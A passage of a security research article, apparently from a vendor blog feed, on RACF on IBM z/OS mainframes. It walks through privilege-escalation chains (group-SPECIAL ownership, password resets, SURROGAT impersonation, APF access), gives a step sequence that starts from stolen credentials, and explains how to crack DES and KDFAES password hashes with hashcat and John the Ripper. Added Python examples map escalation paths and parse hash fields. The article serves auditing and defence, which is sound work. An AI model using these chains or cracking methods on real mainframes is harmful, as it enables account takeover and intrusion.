<p>For instance, consider USER1 with GROUP1 specified in the group-SPECIAL field. If GROUP1 owns GROUP2, and GROUP2 subsequently owns USER5, then USER1 gains privileges over USER5. This is not just about data access; USER1 essentially becomes the owner of USER5. A unique aspect of z/OS is that this level of access allows USER1 to, for example, change USER5’s password, even if USER5 holds privileged attributes like SPECIAL, OPERATIONS, ROAUDIT, AUDITOR, or PROTECTED.</p>
<p>Below is an SQL query, generated using the racfudit utility, that identifies all users and groups where the specified user possesses special attributes:</p>
<pre class="urvanov-syntax-highlighter-plain-tag">select ProfileName, CGGRPNM, CGUACC, CGFLAG2 from USER_BASE WHERE (CGFLAG2 LIKE '%10000000%');</pre>
<p>Here is a query to find users whose owners (AUTHOR) are not the standard default administrators:</p>
<pre class="urvanov-syntax-highlighter-plain-tag">select ProfileName,AUTHOR from USER_BASE WHERE (AUTHOR NOT LIKE '%IBMUSER%' AND AUTHOR NOT LIKE 'SYS1%');</pre>
<p>Let’s illustrate how user privileges can be escalated through these implicit profile relationships.</p>
<div id="attachment_116883" style="width: 1166px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116883" class="size-full wp-image-116883" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9.png" alt="Privilege escalation via the group-SPECIAL field" width="1156" height="575" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9.png 1156w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-1024x509.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-768x382.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-704x350.png 704w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-740x368.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-563x280.png 563w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06223958/zos-mainframe9-800x398.png 800w" sizes="auto, (max-width: 1156px) 100vw, 1156px" /></a><p id="caption-attachment-116883" class="wp-caption-text">Privilege escalation via the group-SPECIAL field</p></div>
<p>In this scenario, the user TESTUSR has the group-SPECIAL field set to PASSADM. This group, PASSADM, owns the OPERATOR user. This means TESTUSR’s scope of influence expands to include PASSADM’s scope, thereby granting TESTUSR control over OPERATOR. Consequently, if TESTUSR’s credentials are compromised, the attacker gains access to the OPERATOR user. The OPERATOR user, in turn, has READ access to the IRR.PASSWORD.RESET resource, which allows them to assign a password to any user who does not possess privileged permissions.</p>
<p>Having elevated privileges in z/OS UNIX is often sufficient for compromising the mainframe. These can be acquired through several methods:</p>
<ul>
<li>Grant the user READ access to the BPX.SUPERUSER resource of the FACILITY class.</li>
<li>Grant the user READ access to UNIXPRIV.SUPERUSER.* resources of the UNIXPRIV class.</li>
<li>Set the UID field to 0 in the OMVS segment of the user profile.</li>
</ul>
<p>For example, the DFSOPER user has READ access to the BPX.SUPERUSER resource, making them privileged in z/OS UNIX and, by extension, across the entire mainframe. However, DFSOPER does not have the explicit privileged fields SPECIAL, OPERATIONS, AUDITOR, ROAUDIT and PROTECTED set, meaning the OPERATOR user can change DFSOPER’s password. This allows us to define the following sequence of actions to achieve high privileges on the mainframe:</p>
<ol>
<li>Obtain and use TESTUSR’s credentials to log in.</li>
<li>Change OPERATOR’s password and log in with those credentials.</li>
<li>Change DFSOPER’s password and log in with those credentials.</li>
<li>Access the z/OS UNIX Shell with elevated privileges.</li>
</ol>
<p>We uncovered another implicit RACF profile relationship that enables user privilege escalation.</p>
<div id="attachment_116884" style="width: 1166px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116884" class="size-full wp-image-116884" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10.png" alt="Privilege escalation from a chain of misconfigurations" width="1156" height="575" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10.png 1156w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-1024x509.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-768x382.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-704x350.png 704w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-740x368.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-563x280.png 563w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224112/zos-mainframe10-800x398.png 800w" sizes="auto, (max-width: 1156px) 100vw, 1156px" /></a><p id="caption-attachment-116884" class="wp-caption-text">Privilege escalation from a chain of misconfigurations</p></div>
<p>In another example, the TESTUSR user has READ access to the OPERSMS.SUBMIT resource of the SURROGAT class. This implies that TESTUSR can create a task under the identity of OPERSMS using the ImpersonateTo relationship. OPERSMS is a member of the HFSADMIN group, which has READ access to the TESTAUTH resource of the TSOAUTH class. This resource indicates whether the user can run an application or library as APF-authorized – this requires only READ access. Therefore, if <a href="#searching-for-inadequate-uacc-control-in-data-sets">APF access is misconfigured</a>, the OPERSMS user can escalate their current privileges to the highest possible level. This outlines a path from the low-privileged TESTUSR to obtaining maximum privileges on the mainframe.</p>
<p>At this stage, the racfudit utility allows identifying these connections only manually through a series of SQLite database queries. However, we are planning to add support for another output format, including Neo4j DBMS integration, to automatically visualize the interconnected chains described above.</p>
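<p>The following Python is an added example, not code from the article or from the racfudit utility: it models the explicit and implicit relationships described above as a directed graph and searches it for chains from a low-privileged user to a highly privileged one. The profile data is constructed to reproduce the two scenarios above (TESTUSR, PASSADM, OPERATOR, DFSOPER, OPERSMS, HFSADMIN); the APF misconfiguration flag and the placeholder groups TESTGRP and SYS1 are assumptions.</p>

```python
from collections import deque

# Attributes that block a password reset via IRR.PASSWORD.RESET (but not via ownership).
PRIVILEGED_ATTRS = {"SPECIAL", "OPERATIONS", "AUDITOR", "ROAUDIT", "PROTECTED"}
# Assumption: APF access is misconfigured, so READ on TESTAUTH is a route to top privileges.
APF_MISCONFIGURED = True

# Constructed sample profiles reproducing the article's two scenarios (not real extracted data).
USERS = {
    "TESTUSR":  {"attrs": set(), "groups": ["TESTGRP"], "group_special": ["PASSADM"], "owner": "SYS1"},
    "OPERATOR": {"attrs": set(), "groups": ["PASSADM"], "group_special": [], "owner": "PASSADM"},
    "DFSOPER":  {"attrs": set(), "groups": ["SYS1"], "group_special": [], "owner": "SYS1"},
    "OPERSMS":  {"attrs": set(), "groups": ["HFSADMIN"], "group_special": [], "owner": "SYS1"},
    "IBMUSER":  {"attrs": {"SPECIAL"}, "groups": ["SYS1"], "group_special": [], "owner": "IBMUSER"},
}
GROUPS = {"SYS1": {"owner": "IBMUSER"}, "PASSADM": {"owner": "SYS1"},
          "HFSADMIN": {"owner": "SYS1"}, "TESTGRP": {"owner": "SYS1"}}
# (class, resource) -> {user or group on the access list: access level}
RESOURCES = {
    ("FACILITY", "IRR.PASSWORD.RESET"): {"OPERATOR": "READ"},
    ("FACILITY", "BPX.SUPERUSER"): {"DFSOPER": "READ"},
    ("SURROGAT", "OPERSMS.SUBMIT"): {"TESTUSR": "READ"},
    ("TSOAUTH", "TESTAUTH"): {"HFSADMIN": "READ"},
}

def owned_by(owner):
    """Users and groups whose OWNER field is `owner` (the Owner edge)."""
    profiles = list(USERS.items()) + list(GROUPS.items())
    return [name for name, prof in profiles if prof["owner"] == owner]

def group_scope(group):
    """Implicit scope of a group-SPECIAL group: the group itself plus everything it owns, transitively."""
    scope, todo = set(), [group]
    while todo:
        cur = todo.pop()
        if cur not in scope:
            scope.add(cur)
            todo.extend(owned_by(cur))
    return scope

def effective_access(user):
    """Access a user holds directly or through group membership: {(class, resource): access}."""
    subjects = {user, *USERS[user]["groups"]}
    return {res: acc for res, acl in RESOURCES.items() for s, acc in acl.items() if s in subjects}

def control_edges():
    """Edges (subject, relationship, object) along which control of one user yields control of another."""
    edges = []
    for user, prof in USERS.items():
        # Group-SPECIAL scope extension: the user becomes an effective owner of every user in scope,
        # which allows changing their password even if they hold privileged attributes.
        for group in prof["group_special"]:
            for target in group_scope(group):
                if target in USERS and target != user:
                    edges.append((user, "GroupSpecial", target))
        access = effective_access(user)
        # READ on IRR.PASSWORD.RESET: reset passwords of users without privileged attributes.
        if access.get(("FACILITY", "IRR.PASSWORD.RESET")) == "READ":
            for target, tprof in USERS.items():
                if target != user and not (tprof["attrs"] & PRIVILEGED_ATTRS):
                    edges.append((user, "ResetPassword", target))
        # READ on SURROGAT <id>.SUBMIT: submit work under that identity.
        for (cls, res), acc in access.items():
            if cls == "SURROGAT" and res.endswith(".SUBMIT") and acc == "READ":
                edges.append((user, "ImpersonateTo", res[: -len(".SUBMIT")]))
    return edges

def high_privilege_reason(user):
    """Why `user` counts as highly privileged, or None."""
    attrs = USERS[user]["attrs"] & {"SPECIAL", "OPERATIONS"}
    if attrs:
        return "attribute " + "/".join(sorted(attrs))
    access = effective_access(user)
    if access.get(("FACILITY", "BPX.SUPERUSER")) == "READ":
        return "READ on BPX.SUPERUSER (z/OS UNIX superuser)"
    if APF_MISCONFIGURED and access.get(("TSOAUTH", "TESTAUTH")) == "READ":
        return "READ on TESTAUTH with misconfigured APF access"
    return None

def escalation_paths(start):
    """Breadth-first search over control edges; returns the shortest chain to each reachable privileged user."""
    adj = {}
    for subj, rel, obj in control_edges():
        adj.setdefault(subj, []).append((rel, obj))
    paths, seen, queue = [], {start}, deque([[start]])
    while queue:
        path = queue.popleft()
        for rel, nxt in adj.get(path[-1], []):
            if nxt in seen or nxt not in USERS:
                continue
            seen.add(nxt)
            new_path = path + [f"-{rel}->", nxt]
            reason = high_privilege_reason(nxt)
            if reason:
                paths.append(" ".join(new_path) + f"  [{reason}]")
            queue.append(new_path)
    return paths

if __name__ == "__main__":
    for chain in escalation_paths("TESTUSR"):
        print(chain)
```

<p>Run against real racfudit output, the same search is a review aid: every chain it prints is a relationship to break (remove the group-SPECIAL connection, tighten the SURROGAT or IRR.PASSWORD.RESET access list, or fix the APF library permissions).</p>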
<h2 id="password-hashes-in-racf">Password hashes in RACF</h2>
<p>To escalate privileges and gain mainframe access, we need the credentials of privileged users. We previously used our utility to <a href="#collecting-password-hashes">extract their password hashes</a>. Now, let’s dive into the password policy principles in z/OS and outline methods for recovering passwords from these collected hashes.</p>
<p>The primary password authentication methods in z/OS, based on RACF, are PASSWORD and PASSPHRASE. PASSWORD is a password composed by default of ASCII characters: uppercase English letters, numbers, and special characters (@#$). Its length is limited to 8 characters. PASSPHRASE, or a password phrase, has a more complex policy, allowing 14 to 100 ASCII characters, including lowercase or uppercase English letters, numbers, and an extended set of special characters (@#$&amp;*{}[]()=,.;'+/). Hashes for both PASSWORD and PASSPHRASE are stored in the user profile within the BASE segment, in the PASSWORD and PHRASE fields, respectively. Two algorithms are used to derive their values: DES and KDFAES.</p>
<p>It is worth noting that we use the terms “password hash” and “password phrase hash” for clarity. When using the DES and KDFAES algorithms, user credentials are stored in the RACF database as encrypted text, not as a hash sum in its classical sense. Nevertheless, we will continue to use “password hash” and “password phrase hash” as is customary in IBM documentation.</p>
<p>Let’s discuss the operating principles and characteristics of the DES and KDFAES algorithms in more detail.</p>
<h3 id="des">DES</h3>
<p>When the DES algorithm is used, the computation of PASSWORD and PHRASE values stored in the RACF database involves classic DES encryption. Here, the plaintext data block is the username (<a href="https://en.wikipedia.org/wiki/Padding_(cryptography)" target="_blank" rel="noopener">padded</a> to 8 characters if shorter), and the key is the password (also padded to 8 characters if shorter).</p>
<h4 id="password">PASSWORD</h4>
<p>The username is encrypted with the password as the key via the DES algorithm, and the 8-byte result is placed in the user profile’s PASSWORD field.</p>
<div id="attachment_116885" style="width: 1209px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116885" class="size-full wp-image-116885" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11.png" alt="DES encryption of a password" width="1199" height="524" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11.png 1199w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-300x131.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-1024x448.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-768x336.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-801x350.png 801w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-740x323.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-641x280.png 641w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224222/zos-mainframe11-800x350.png 800w" sizes="auto, (max-width: 1199px) 100vw, 1199px" /></a><p id="caption-attachment-116885" class="wp-caption-text">DES encryption of a password</p></div>
<p>Keep in mind that both the username and password are encoded with <a href="https://www.ibm.com/docs/en/zos-basic-skills?topic=mainframe-ebcdic-character-set" target="_blank" rel="noopener">EBCDIC</a>. For instance, the username <code>USR1</code> would look like this in EBCDIC: <code>e4e2d9f140404040</code>. The byte <code>0x40</code> serves as padding for the plaintext to reach 8 bytes.</p>
<p>Such a password can be recovered quickly: the keyspace is small and DES is computationally cheap. For example, a brute-force attack powered by a cluster of NVIDIA 4090 GPUs takes less than five minutes.</p>
<p>The hashcat tool includes a module (Hash-type 8500) for cracking RACF passwords with the DES algorithm.</p>
<h4 id="passphrase">PASSPHRASE</h4>
<p>PASSPHRASE encryption is a bit more complex, and a detailed description of its algorithm is not readily available. However, our research uncovered certain interesting characteristics.</p>
<p>First, the final hash length in the PHRASE field matches the original password phrase length. Essentially, the encrypted data output from DES gets truncated to the input plaintext length without padding. This design can clearly lead to collisions and incorrect authentication under certain conditions. For instance, if the original password phrase is 17 bytes long, it will be encrypted in three blocks, with the last block padded with seven bytes. These padded bytes are then truncated after encryption. In this scenario, any password whose first 17 encrypted bytes match the encrypted PASSPHRASE would be considered valid.</p>
<p>The second interesting feature is that the PHRASE field value is also computed using the DES algorithm, but it employs a proprietary block chaining mode. We will informally refer to this as IBM-custom mode.</p>
<div id="attachment_116886" style="width: 1209px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116886" class="size-full wp-image-116886" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12.png" alt="DES encryption of a password phrase" width="1199" height="524" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12.png 1199w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-300x131.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-1024x448.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-768x336.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-801x350.png 801w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-740x323.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-641x280.png 641w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224333/zos-mainframe12-800x350.png 800w" sizes="auto, (max-width: 1199px) 100vw, 1199px" /></a><p id="caption-attachment-116886" class="wp-caption-text">DES encryption of a password phrase</p></div>
<p>Given these limitations, we can use the hashcat module for RACF DES to recover the first 8 characters of a password phrase from the first block of encrypted data in the PHRASE field. In some practical scenarios, recovering the beginning of a password phrase allowed us to guess the remainder, especially when weak dictionary passwords were used. For example, if we recovered <code>Admin123</code> (8 characters) while cracking a 15-byte PASSPHRASE hash, then it is plausible the full password phrase was <code>Admin1234567890</code>.</p>
<h3 id="kdfaes">KDFAES</h3>
<p>Computing passwords and password phrases generated with the KDFAES algorithm is significantly more challenging than with DES. KDFAES is a proprietary IBM algorithm that leverages AES encryption. The encryption key is generated from the password using the PBKDF2 function with a specific number of hashing iterations.</p>
<h4 id="password">PASSWORD</h4>
<p>The diagram below outlines the multi-stage KDFAES PASSWORD encryption algorithm.</p>
<div id="attachment_116887" style="width: 1517px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116887" class="size-full wp-image-116887" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13.png" alt="KDFAES encryption of a password" width="1507" height="1110" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13.png 1507w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-300x221.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-1024x754.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-768x566.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-475x350.png 475w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-740x545.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-380x280.png 380w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224426/zos-mainframe13-800x589.png 800w" sizes="auto, (max-width: 1507px) 100vw, 1507px" /></a><p id="caption-attachment-116887" class="wp-caption-text">KDFAES encryption of a password</p></div>
<p>The first stage mirrors the DES-based PASSWORD computation algorithm. Here, the plaintext username is encrypted using the DES algorithm with the password as the key. The username is also encoded in EBCDIC and padded if it’s shorter than 8 bytes. The resulting 8-byte output serves as the key for the second stage: hashing. This stage employs a proprietary IBM algorithm built upon PBKDF2-SHA256-HMAC. A randomly generated 16-byte string (salt) is fed into this algorithm along with the 8-byte key from the first stage. This data is then iteratively hashed using PBKDF2-SHA256-HMAC. The number of iterations is determined by two parameters set in RACF: the memory factor and the repetition factor. The output of the second stage is a 32-byte hash, which is then used as the key for AES encryption of the username in the third stage.</p>
<p>The final output is 16 bytes of encrypted data. The first 8 bytes are appended to the end of the PWDX field in the user profile BASE segment, while the other 8 bytes are placed in the PASSWORD field within the same segment.</p>
<p>The PWDX field in the BASE segment has the following structure:</p>
<table>
<tbody>
<tr>
<td><strong>Offset</strong></td>
<td><strong>Size</strong></td>
<td><strong>Field</strong></td>
<td><strong>Comment</strong></td>
</tr>
<tr>
<td><strong>0–3</strong></td>
<td>4 bytes</td>
<td><a href="https://encyclopedia.kaspersky.com/glossary/magic-number/" target="_blank" rel="noopener">Magic number</a></td>
<td>In the profiles we analyzed, we observed only the value E7D7E66D</td>
</tr>
<tr>
<td><strong>4–7</strong></td>
<td>4 bytes</td>
<td>Hash type</td>
<td>In the profiles we analyzed, we observed only two values: 00180000 for PASSWORD hashes and 00140000 for PASSPHRASE hashes</td>
</tr>
<tr>
<td><strong>8–9</strong></td>
<td>2 bytes</td>
<td>Memory factor</td>
<td>A value that determines the number of iterations in the hashing stage</td>
</tr>
<tr>
<td><strong>10–11</strong></td>
<td>2 bytes</td>
<td>Repetition factor</td>
<td>A value that determines the number of iterations in the hashing stage</td>
</tr>
<tr>
<td><strong>12–15</strong></td>
<td>4 bytes</td>
<td>Unknown value</td>
<td>In the profiles we analyzed, we observed only the value 00100010</td>
</tr>
<tr>
<td><strong>16–31</strong></td>
<td>16 bytes</td>
<td>Salt</td>
<td>A randomly generated 16-byte string used in the hashing stage</td>
</tr>
<tr>
<td><strong>32–39</strong></td>
<td>8 bytes</td>
<td>The first half of the password hash</td>
<td>The first 8 bytes of the final encrypted data</td>
</tr>
</tbody>
</table>
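<p>The Python below is an added example, not code from the article or from racfudit: it builds the EBCDIC plaintext block from the DES section above and parses the PWDX layout from the table, reassembling the 16-byte KDFAES output from the PWDX tail and the PASSWORD field. It assumes code page 037 for EBCDIC; the sample field bytes are constructed, and the TYPE inference (a PWDX field carrying the KDFAES magic means KDFAES, otherwise DES) is this example's reading of the article, not a documented RACF rule.</p>

```python
import struct

PWDX_MAGIC = bytes.fromhex("E7D7E66D")   # the only magic value seen in the analyzed profiles
HASH_TYPES = {0x00180000: "PASSWORD", 0x00140000: "PASSPHRASE"}
PWDX_LEN = 40
EBCDIC_SPACE = 0x40                      # padding byte for the DES plaintext block

def des_plaintext_block(username: str) -> bytes:
    """8-byte DES plaintext: the user name in EBCDIC (code page 037), padded with 0x40 to 8 bytes."""
    if not 1 <= len(username) <= 8:
        raise ValueError("RACF user IDs are 1 to 8 characters")
    # RACF user IDs are uppercase; lowercase letters have different EBCDIC codes.
    return username.upper().encode("cp037").ljust(8, bytes([EBCDIC_SPACE]))

def parse_pwdx(pwdx: bytes) -> dict:
    """Split a 40-byte PWDX (or PHRASEX) field into the parts listed in the table above."""
    if len(pwdx) != PWDX_LEN:
        raise ValueError(f"PWDX must be {PWDX_LEN} bytes, got {len(pwdx)}")
    # Offsets 0-15: magic, hash type, memory factor, repetition factor, unknown value (big-endian).
    magic, hash_type, mem, rep, unknown = struct.unpack(">4sIHHI", pwdx[:16])
    if magic != PWDX_MAGIC:
        raise ValueError(f"unexpected PWDX magic {magic.hex()}")
    return {
        "hash_type": HASH_TYPES.get(hash_type, f"unknown(0x{hash_type:08X})"),
        "memory_factor": mem,
        "repetition_factor": rep,
        "unknown": unknown,
        "salt": pwdx[16:32],            # 16-byte random salt for the PBKDF2 stage
        "hash_first_half": pwdx[32:40],  # first 8 bytes of the final AES output
    }

def kdfaes_ciphertext(pwdx: bytes, password_field: bytes) -> bytes:
    """Reassemble the 16-byte final AES output: the PWDX tail, then the 8-byte PASSWORD field."""
    if len(password_field) != 8:
        raise ValueError("PASSWORD field must be 8 bytes")
    return parse_pwdx(pwdx)["hash_first_half"] + password_field

def password_hash_type(password_field: bytes, pwdx) -> str:
    """Derived password TYPE: KDFAES when a PWDX field with the magic is present, else DES."""
    if pwdx and len(pwdx) == PWDX_LEN and pwdx[:4] == PWDX_MAGIC:
        return "KDFAES"
    if len(password_field) != 8:
        raise ValueError("PASSWORD field must be 8 bytes")
    return "DES"

# Constructed sample field values: memory factor 0x08, repetition factor 0x32 as in the text;
# the salt and hash bytes are arbitrary test data.
SAMPLE_PWDX = bytes.fromhex(
    "E7D7E66D" "00180000" "0008" "0032" "00100010"
    "00112233445566778899aabbccddeeff" "0123456789abcdef")
SAMPLE_PASSWORD = bytes.fromhex("fedcba9876543210")

if __name__ == "__main__":
    print(des_plaintext_block("USR1").hex())                # e4e2d9f140404040
    info = parse_pwdx(SAMPLE_PWDX)
    print(info["hash_type"], info["memory_factor"], info["repetition_factor"], info["salt"].hex())
    print(kdfaes_ciphertext(SAMPLE_PWDX, SAMPLE_PASSWORD).hex())
    print(password_hash_type(SAMPLE_PASSWORD, SAMPLE_PWDX), password_hash_type(SAMPLE_PASSWORD, None))
```

<p>For a defender, the two factors this parser exposes are the ones to audit: low memory and repetition factors, or a DES value where no PWDX is present, are the profiles whose credentials are cheapest to recover offline.</p>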
<p>You can use the <a href="https://github.com/openwall/john/blob/bleeding-jumbo/src/racf_kdfaes_fmt_plug.c" target="_blank" rel="noopener">dedicated module</a> in the John the Ripper utility for offline password cracking. While an <a href="https://github.com/hashcat/hashcat/pull/2777/commits/f4080424a39e537a4004ec2c9664301a4fc658c2" target="_blank" rel="noopener">IBM KDFAES module</a> for an older version of hashcat exists publicly, it was never integrated into the main branch. Therefore, we developed our own <a href="https://github.com/hashcat/hashcat/pull/3940" target="_blank" rel="noopener">RACF KDFAES module</a> compatible with the current hashcat version.</p>
<p>The time required to crack a RACF KDFAES hash has <a href="https://www.detack.de/_docs/media/19_1_1641358905.pdf" target="_blank" rel="noopener">significantly increased</a> compared to RACF DES, largely due to the integration of PBKDF2. For instance, if the memory factor and repetition factor are set to 0x08 and 0x32 respectively, the hashing stage can reach 40,000 iterations. This can extend the password cracking time to several months or even years.</p>
<h4 id="passphrase">PASSPHRASE</h4>
<div id="attachment_116888" style="width: 1517px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116888" class="size-full wp-image-116888" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14.png" alt="KDFAES encryption of a password phrase" width="1507" height="1110" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14.png 1507w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-300x221.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-1024x754.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-768x566.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-475x350.png 475w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-740x545.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-380x280.png 380w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/06224540/zos-mainframe14-800x589.png 800w" sizes="auto, (max-width: 1507px) 100vw, 1507px" /></a><p id="caption-attachment-116888" class="wp-caption-text">KDFAES encryption of a password phrase</p></div>
<p>Encrypting a password phrase with KDFAES shares many similarities with encrypting a password. According to <a href="https://www.detack.de/_docs/media/19_1_1641358905.pdf" target="_blank" rel="noopener">public sources</a>, the primary difference lies in the key used during the second stage: for passwords, data derived from DES-encrypting the username is used, while for a password phrase its SHA256 hash is used. During our analysis, we could not determine the exact password phrase hashing process – specifically, whether padding is involved, whether a secret key is used, and so on.</p>
<p>Additionally, for a password phrase the final hash is stored in the PHRASE and PHRASEX fields instead of PASSWORD and PWDX, respectively; the PHRASEX value has a structure similar to that of PWDX.</p>
<h2 id="conclusion">Conclusion</h2>
<p>In this article, we have explored the internal workings of the RACF security package, developed an approach to extracting information, and presented our own tool developed for the purpose. We also outlined several potential misconfigurations that could lead to mainframe compromise and described methods for detecting them. Furthermore, we examined the algorithms used for storing user credentials (passwords and password phrases) and highlighted their strengths and weaknesses.</p>
<p>We hope that the information presented in this article helps mainframe owners better understand and assess the potential risks associated with incorrect RACF security suite configurations and take appropriate mitigation steps. Transitioning to the KDFAES algorithm and password phrases, controlling UACC values, verifying access to APF libraries, regularly tracking user relationship chains, and other steps mentioned in the article can significantly enhance your infrastructure security posture with minimal effort.</p>
<p>In conclusion, it is worth noting that only a small percentage of the RACF database structure has been thoroughly studied. Comprehensive research would involve uncovering additional relationships between database entities, further investigating privileges and their capabilities, and developing tools to exploit excessive privileges. The topic of password recovery is also not fully covered because the encryption algorithms have not been fully studied. IBM z/OS mainframe researchers have immense opportunities for analysis. As for us, we will continue to shed light on the obscure, unexplored aspects of these devices, to help prevent potential vulnerabilities in mainframe infrastructure and associated security incidents.</p>
]]></content:encoded>
<wfw:commentRss>https://securelist.com/zos-mainframe-pentesting-resource-access-control-facility/116873/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
<media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/08091236/zos-racf-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
</item>
<item>
<title>Batavia spyware steals data from Russian organizations</title>
<link>https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/</link>
